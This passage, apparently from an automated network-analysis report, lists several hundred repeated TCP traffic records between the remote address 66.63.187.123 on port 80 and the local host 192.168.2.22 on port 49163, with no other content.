                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
